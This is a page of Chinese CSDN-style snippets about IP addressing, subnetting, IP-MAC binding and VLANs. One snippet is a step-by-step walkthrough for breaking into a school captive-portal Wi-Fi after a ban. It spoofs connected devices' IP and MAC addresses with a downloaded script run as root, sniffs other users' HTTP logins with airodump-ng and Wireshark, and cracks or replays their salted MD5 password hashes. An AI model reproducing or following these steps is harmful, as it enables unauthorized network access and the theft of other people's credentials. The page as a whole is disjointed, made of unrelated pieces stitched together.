精华内容
下载资源
问答
  • 主机号为0 为这一区域网关 分类IP地址 特殊IP地址 私有IP地址 学校 用 可用个数 网络地址转换NAT

    在这里插入图片描述
    主机号为0 为这一区域的网关

    分类IP地址

    在这里插入图片描述

    特殊IP地址

    在这里插入图片描述

    私有IP地址

    学校 用
    在这里插入图片描述

    可用的个数

    在这里插入图片描述

    网络地址转换NAT

    在这里插入图片描述

    展开全文
  • 学校机房总是需要切换系统or重装系统, ...但系统部署完成后IP要么冲突,要么就是没有IP地址的情况,这种情况下该怎么与控制端通信呢,就像网络同传软件一下,局域网下,没有IP地址也可以通信。 是基于什么协议呢
  • 局域网的一大特点就是拥有一定数量的终端用户。例如一所重点中学,学校局域网的终端用户有600多个,为了区分...今天这篇文章就为大家解决这两个问题:所以采用了基于防火墙的IP地址与MAC地址绑定+基于交换机的MAC地址

    局域网的一大特点就是拥有一定数量的终端用户。例如一所重点中学,学校局域网的终端用户有600多个,为了区分各类不同用户,我们采用的是终端固定IP设置的方法。和其他许多学校的网管一样,我们也一直被终端用户私改IP地址造成的网络冲突问题困扰着。咨询相关网络公司,他们也提供了不少解决方案,但大多价格不菲。没有办法,只好绞尽脑汁自己想办法了。

    同样,局域网内ip地址“不够用”也在网络规划与维护中是一个常见的问题。今天这篇文章就为大家解决这两个问题:所以采用了基于防火墙的IP地址与MAC地址绑定+基于交换机的MAC地址与端口绑定的二级管理方法,双管齐下,较好地解决了这个问题。

    一、基于防火墙的IP地址与MAC地址绑定

    1. 做好整个局域网终端用户计算机的命名,指定IP地址根据用户的类别统一命名计算机,并给定IP地址。这样一看机器名,就知道是哪个部门哪台机器,便于管理。比如高一年级语文组1号机器,我们就将其命名为“gaoyiyuwen01”。同时,统一规划分配IP地址给每台终端机器,并建立IP地址分配登记表(见附表)。

    2. 统计每个终端机器网卡的MAC地址,建立IP地址与MAC地址对应表我们知道,在MS-DOS方式下键入命令“Winipcfg”就可以获得本机IP地址和MAC地址(Windows 98系统下)。我们可以将此方法公布一下,然后要求相关用户将本机MAC地址抄录上报到网管中心,再进行登记汇总。也可在设定机器名和IP地址时一并统计好。网络管理员也可以利用Nbtstat命令来远程获得指定机器的MAC地址。在MS-DOS方式下键入命令“Nbtstat -a 远程计算机名”,即可获得指定机器的IP地址和MAC地址。

    3. 将IP地址与MAC地址绑定这要根据局域网接入互联网的方式不同而采用不同的办法。如果是采用代理服务器接入互联网,那就使用命令:ARP -s IP地址 MAC地址例:ARP -s 192.168.1.4 00-EO-4C-6C-08-75这样,就将静态IP地址192.168.1.4与网卡地址为00-EO-4C-6C-08-75的计算机绑定在一起了,即使别人盗用您的IP地址192.168.1.

    4,也无法通过代理服务器上网。如果是通过路由器直接接入互联网,最好通过硬件防火墙来实现IP与MAC地址的绑定。一般的硬件防火墙都具有这个功能,具体操作也非常简单。到这里似乎可以大功告成了,但事情并不像我们想象的那么简单。花了相当多的精力构筑起来的防线不到一个月就又冲突依旧了。原来,有的终端用户通过修改注册表、下载专用小工具等方法,没费多少力气就更改了本机的MAC地址,甚至于将本机的MAC地址和IP地址改得和主服务器一模一样,搞得局域网内又鸡犬不宁了。

    二、基于交换机的MAC地址与端口绑定

    为了进一步解决这个问题,笔者又想到了基于交换机的MAC地址与端口绑定。这样一来,终端用户如果擅自改动本机网卡的MAC地址,该机器的网络访问将因其MAC地址被交换机认定为非法而无法实现,自然也就不会对局域网造成干扰了。如果是在一个小型的局域网里可能完全不必要考虑IP地址不够的情况,但是在超过“255台”电脑的大型局域网里,就必须要考虑电脑IP地址不够用该如何解决了。很多时候企业局域网络出现私网地址192.168.1.x-255不够用了,去掉一个广播地址及一个网络地址后就可能不够用。(0是网络地址不可用, 255是广播地址,除去这2个,可用的就是254个地址)。那么如何解决呢?首先,我们来了解一下IP地址:“X.X.X.X”x代表0到255之间的任意一个自然数,但是,在局域网里面,这里的数字设置是有规则的,一般是由子网掩码来划分。比如255.255.255.0。说明最后面一个X可以从0到255之间随意改变。当网关是192.168.1.1时,我们可以设置成192.168.1.1–192.168.1.254。当在一个局域网内,ip地址超过了数量怎么办,这个通常发生在C类的ip地址局域网中较多,可以有三种方法来解决这个问题。

    一、改子网掩码因此当子网掩码设置成255.255.255.0时,路由器下面的局域网最多只能"254台"电脑分配相对独立的IP地址。要想增加局域网IP,那么可以修改下子网掩码就可以了,比如子网掩码从255.255.255.0修改成255.255.0.0,那么我们局域网里面的电脑IP就相当于可以设置254乘以254台电脑,有64516个IP地址。而IP的第三个X也可以从0到255之间任意一个数字变192.168.X.X。 如果还要更多,那么可以设置成255.0.0.0,局域网就可以拥有254254254台电脑。不过这样设置的话相当于这些所有电脑都处于一个局域网里面,而且可以相互访问,容易引起“网络风暴”。

    二、增加路由器的方法也可以通过路由器后面再接路由器来分成多个网段,不过这种方法不太超大型网络。如果原来的网段为192.168.1.1。那么可以新增网段,192.168.X.1 。操作步骤:新增加一个路由器即可!分配一个IP地址给新增的路由器静态IP绑定下,然后如果想省事可以启用DHCP,如果不想省事就自己设置IP地址。路由器的网关一定要改!

    一般默认的都是192.168.0.1 或 192.168.1.1 ,你新增网段的网关应该是192.168.X.1切记!如果你新设置IP地址设置为192.168.2.1的话。新路由器的IP地址池可以为 192.168.2.2~~~192.168.2.254之间。连接方法: 之前的路由器LAN口和现在路由器的WAN口相连接。然后你新的路由器就可以上网了。可以再接一个交换机插在新路由器的LAN口。

    三、划分VLAN 最好的方法是通过设置虚拟局域网“VLAN”,将局域网里面的电脑分成多个虚拟的局域网,可以减少网络风暴,而且可以提高交换机跟路由器的工作效率。有的交换机自带有VLAN接口,那么只要将网线按需要分别接到相应的网段。通过子网划分!你可以将IP地址设置成192.168.0.0/23那么可以划分192.168.0.x和192.168.1.x二个网段,增加了IP的数量,当然也可以续继续划分多个网段。网段一:192.168.0.x,192.168.0.1——192.168.0.254 ,子网掩码255.255.254.0。网段二:192.168.1.x ,192.1681.1——192.168.1.254,255.255.254.0。这样192.168.0.x和192.168.1.x就可以互通,而不需要其他设备。

    END
    为了更好地帮助大家学习并了解网络工程师,等相关内容,我特意将所有资料进行了系统整理,这里也免费分享大家。为大家整理的网工必备资料,包括:
    华为认证思维导图(超细);
    华为认证必备知识文档(pdf);
    网工必备知识文档合集;
    网工必备工具包;
    网工必备实验包;
    网工必备视频面试包。
    ……
    资料有点多 我就不全列出来了,先写到这,需要资料或者是有任何问题,都可以欢留言、私信交流讨论~

    展开全文
  • 我觉得这可以简单用身份证号和学号进行类比.MAC地址相当于身份证号,IP地址相当于学号. 没有身份证号,学校什么给你分配学号啊?哪天你不开心了,想要换一个学号,(假如学校同意了)那你身份证号就和新学号绑定了....

    刚开始我就不理解了,为什么有IP地址还要MAC地址?有MAC地址为什么还要IP地址?
    突然想到一个问题,没有MAC地址,怎么分配IP地址?
    我觉得这可以简单的用身份证号和学号进行类比.MAC地址相当于身份证号,IP地址相当于学号.
    没有身份证号,学校什么给你分配学号啊?哪天你不开心了,想要换一个学号,(假如学校同意了)那你的身份证号就和新的学号绑定了.

    胡言乱语,不喜勿喷哈哈

    展开全文
  • 我用ngrok进行的内网穿透,但是我无论在公网还是局域网下访问管理员界面都自动跳转家里wifi下分配的ip地址。(网页是可以加载的,就是管理员界面打不开,IP/wp-login.php登陆成功之后就没了。。。)后来我删了mysql...
  • 并非每个设备都支持WPA2验证,在很多公共设施(酒店,机场,学校)都会提供使用captive portal无线网: 用户连上后被导入验证页面,然后输入帐号密码上网。这种验证方式并非天衣无缝,相反,有很多种方法可以绕过...

    简介

    本文简要阐述如何通过脚本进行MAC spoofing连上学校无线网,并针对其中设备进行嗅探/情报收集

    原理

    并非每个设备都支持WPA2验证,在很多公共设施(酒店,机场,学校)都会提供使用captive portal的无线网:
    用户连上后被导入验证页面,然后输入帐号密码上网。这种验证方式并非天衣无缝,相反,有很多种方法可以绕过,甚至能危害这些公共网络中设备的安全性,造成安全隐患。

    步骤

    DEFCON 2016的演讲中就涉及到如何针对captive portal实现攻击,其中主要办法有:

    1. 通过伪造DNS数据包通过端口53/67发包给外部DNS服务器,DNS解析后和远程服务器进行通信
    2. ICMP发包
    3. 通过nmap扫描网内IP和MAC,修改IP和MAC连上无线网

    实战

    这里详细介绍第三种。笔者此前被学校IT部禁止使用校园网,原有帐号肯定不行了,但道高一尺,魔高一仗,世界上没有密不透风的墙(嘿嘿)

    步骤

    笔者的系统是Ubuntu 18.04, 此方法适合用于大部分Linux系统
    安装nmap和sipcalc:

    sudo apt -y install sipcalc nmap
    

    下载脚本:

    wget https://raw.githubusercontent.com/systematicat/hack-captive-portals/master/hack-captive.sh
    sudo chmod u+x hack-captive.sh
    

    执行脚本:

    sudo ./hack-captive.sh
    

    当你看到这行字,就可以连上网啦:

    Pwned! Now you can surf the Internet!
    

    注意,这个脚本的原理是用nmap扫描无线网中的ip,然后不断伪造成某个ip欺骗地址,其实未必要等到出现这行字才能连上网。跟据DEFCON 2016的演讲,频繁更改IP地址并不会立即连上无线网,但一般在30秒之后就可以正常了(网络服务器需要响应时间)。如果手动更改MAC地址也是可以的,其实是一样的原理,脚本自动化程度更高

    连上网之后登录localhost,发现是某台打印机QAQ

    注意:此法需要已有连上网络的设备,是一种中间人攻击方法

    windows下的配置开机

    那么问题来了,如果你用的系统不是linux呢?不用急,我们有虚拟机
    下载virtual box,安插USB wifi天线,安装Kali镜像,开机!
    安装好nmap和脚本后,安装额外的dependency:

    sudo apt install wpasupplicant
    sudo apt install haveged hostapd git util-linux procps iproute2 iw dnsmasq iptables
    git clone https://github.com/oblique/create_ap
    cd create_ap
    sudo make -j6 install     #笔者6核CPU
    cd .. && rm -rf create_ap
    
    sudo systemctl stop NetworkManager
    sudo airmon-ng check kill
    

    关闭和主机host的连接:

    sudo ip link set eth0 down
    
    sudo nano wpa_sup.conf
    

    输入如下内容:

    network={
            ssid="i_spac_5FL-2.4GHz"
            key_mgmt=NONE
            priority=100
    }
    

    把如下wlan0更换为你的wifi网卡名字:

    sudo wpa_supplicant -i wlan0 -c wpa_sup.conf
    

    等到直到出现如下的文字:

    wlan0: CTRL-EVENT-CONNECTED - Connection to 88:dc:96:55:19:e4 completed [id=0 id_str=]
    

    ctrl + alt + T打开另一个terminal:

    sudo dhclient wlan0
    sudo ./hack-captive.sh
    

    使用如下格式设置热点:

    sudo create_ap <INTERFACE_FOR_AP> <INTERFACE_WITH_INTERNET> <AP_NAME>
    

    如:

    sudo create_ap wlan1 wlan0 myHotSpot
    

    其中wlan1为热点广播interface,wlan0为虚拟机wifi interface, myHotSpot是你热点的名称
    如果要设置密码使用如下的格式:

    sudo create_ap <INTERFACE_FOR_AP> <INTERFACE_WITH_INTERNET> <AP_NAME> <PASSWORD>
    

    这样我们就通过虚拟机连上了wifi,并且生成了热点,我们的主机windows就可以连接此热点上网了
    注:此法需要额外USB wifi天线,推荐Panda双波段天线支持2.4和5GHz数据链

    伪造用户credential入网

    使用Kali:

    sudo systemctl stop NetworkManager
    sudo airmon-ng check kill
    

    开启WIFI天线监听模式:

    sudo ip link set wlan0 down
    sudo iw wlan0 set monitor control
    sudo ip link set wlan0 up
    

    开始监听:

    sudo airodump-ng wlan0
    

    选择channel 10 监听,抓到的数据包存在/root/cap

    sudo airodump-ng --channel 10 -w /root/cap wlan0
    

    wireshark打开数据包:

    tcp.port == 80
    

    只显示HTTP数据包
    我们发现密码是一串加盐MD5
    利用hashcat配合GPU,彩虹表爆破~~
    如果破不出来也不要紧,因为服务器不会在意你到底有没有原始密码,你可以直接把这串哈希发上去

    此文不方便放图(怕被查水表)大家看看就好,

    展开全文
  • 查看ip地址

    2014-08-11 17:44:14
    怎样查看自己的ip地址,我的电脑本机IP是什么? IP地址分内网的外网两种,如果你是在家里上网并没有使用路由器的话,则不存在内网IP的问题,如果是在单位或学校,有许多朋友一起上网,那么就会有内网IP和外网IP之...
  • 项目需求:学校考试,一共有110组,共分为5个区,每个区有22个组,每个组中有5个人,使用笔记本电脑考试。要求5个区域做物理隔离。...网络拓扑如下所示:解决方案:将服务器的IP地址设置22个IP地址。如...
  • 目录 问题描述 问题解决 ...当我们在不同环境中使用linux的时候,会发现一个问题:我们在任何地方调用ifconfig命令,我们查询到的地址都是这个地址...那么问题来了,为什么我们在不同的地方,分给我们的ip地址确实
  • IP地址是主机还是网卡 ?

    千次阅读 2019-09-22 17:02:53
    从路由器后台界面可以看到,路由器为每个人电脑分配了一个IP地址。这看上去IP是属于主机. 进入职场以后,公司电脑都安装了两个物理网卡,通过两根网线分别接入了两个网络(10.X.X.X/8 和 192.X.X.X/24). 从...
  • ip地址与dns关系

    2020-06-21 15:06:50
    IP地址划分: A类地址 IP地址范围 0.0.0.0~126.255.255.255 主要分配给超大型网络公司 B类地址IP地址范围128.0.0.0~191.255.255.255 主要分配给大型局域网环境公司 127是本地...页原理/dns与IP地址关系: 1、通过互
  • 根据IP地址获取地理位置

    万次阅读 2018-09-23 17:19:37
    注意:这里指的是公网的IP地址,而不是局域网的IP地址,之前因为我是在学校,所以获取的本机IP是经过校园再分配的地址,不是公网的IP地址,导致定位失败。所以我们需要用到IP查询接口,之前用的是:http://ip.c...
  • 实现网站对IP地址的限制访问

    千次阅读 2020-05-14 12:44:42
    由于互联网上整个ipv4的ip有限,导致了上网的设备不能都分配到公网ip,所以路由器等设备出现了,让一个小区或一个学校等单位共享一个出口IP进行上网。 再回到我们今天的主题,通常现在ip访问有3种做法:1.机房的网络...
  • ip地址段获取工具.rar

    2020-04-10 09:24:02
    ip地址查询 通过该工具可以查询指定IP的物理地址或域名服务器的IP和物理地址,及所在国家或城市,甚至精确到某个网吧,机房或学校等;查出的结果仅供参考!
  • 2、每个宿舍每个端口的IP地址的分配是不是都在这个机房的三层交换机上进行? 3、各栋宿舍楼机房的大交换机以上是不是还有一个交换机或者路由器,学校一般是怎样进行网络管理的? 希望大神解惑~谢谢
  • 这个ip是通过网络->本地连接->属性->ipv4 那里看到的ip,这个ip机房里面的机器都一样, 而,我用cmd的ipconfig看到的ip就大家都不一样...这两个ip地址不应该是相同的么?通过属性设置的难道不是本机ip?求大家解惑。。
  • 网络之Ip地址

    2015-11-04 12:51:00
    0.0.0.0---255.255.255....IP地址范围(,唯一,花钱) 最大主机数 私有IP地址范围 (做内网ip,不可直接访问公网;比如学校网,不花钱) A 126(2^7-2) 1.0.0.0—126.255.255.255...
  • IP地址配置前导知识:熟悉TCP/IP四层模型--网络层,ip地址概念实验环境:vmware workstation虚拟机安装CentOS7实验笔记IP地址设置是Linux服务器配置第一步,设置ip地址方法有临时设置法,临时设置方法通过ifconfig...
  • Spark实现ip地址查询

    2020-10-30 11:01:45
    我们根据每个用户的IP地址,与我们的IP地址段进行比较,确认每个IP落在哪一个IP端内,获取经纬度,然后绘制热力图 因此,我们需要通过日志信息(运行商或者网站自己生成)和城市ip段信息来判断用户的ip段,统计热点...
  • 给定ip地址返回所属子网(可能多个网段组成,比如学校图书馆网络有多个网段),有什么效率高算法?最好是O(1),
  • 大二学生一名,闲来无事,想用自己电脑作为Web服务器发布网站,遇到了一些IP地址方面的问题 在教室里面,我用电脑连接学校wifi。 百度本机ip得到223.3.15.184  花生壳实际绑定的ip是58.213.113.74 我就让外地...
  • 苹果笔记本设置MAC地址和ip地址

    万次阅读 2016-11-26 11:40:32
    由于学校给每个实验室分配固定的IP和上网帐号,用苹果笔记本通过转街头链接网线需要设置接口的MAC地址、ip地址等。下面一一详细介绍: 一、设置苹果笔记本(mac pro)的 MAC地址。 第一步:首先先在终端输入如下...
  • 局域网的一大特点就是拥有一定数量的终端用户。笔者所在学校局域网的终端用户有600多个,为了区分各类不同用户,我们采用的是终端固定IP设置的...笔者采用了基于防火墙的IP地址与MAC地址绑定+基于交换机的MAC地址与...
  • 怎样禁止修改ip地址

    2012-11-17 11:16:22
    最近小编有个刚做了老师同学向小编倒苦水,说现在学生在学校机房经常随意修改IP地址,从导致很多计算机无法正常上网。那么如何禁止修改ip地址呢?其实很简单,下面便看看几种禁止修改ip方法。  怎样禁止修改...
  • 切换IP地址的小工具

    千次阅读 2011-08-30 15:31:07
    由于学校采用了静态IP,以至于每次换网络环境时候就要调整一次,非常麻烦。所以在网上找了相关文章来看,试图用python写一个这样小工具。 本来是想用WMI,但是总是报错,不知道为什么。弄不下去了我就试...
  • 最近回到学校,拿着笔记本电脑高高兴兴的去了图书馆准备自己...一查IP,IP地址不一样。这可无语了,猛地发现WiFi的路由不同分配的IP也不同。 不过,没关系!一切问题都可以解决的 查了相关的资料后才知道,只要修改
  • 也不知怎么,自从从学校回来后,我centos7中网络就一直不通,之前以为是从学校到家里因为网络环境变化,但是centos网络配置没有跟着改变,所以在vmware重新装了多次,还是不行,中间也看了好多帖子,中间...
  • 不过,静态IP上网在以下场合也有应用,我们经常被问到话题,就是关于静态ip地址要如何设置,下面就教大家路由器设置静态ip地址的配置方法,一起来学习下吧! 路由器设置静态ip地址的配置步骤: 1、打开浏览器,...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 785
精华内容 314
关键字:

学校的ip地址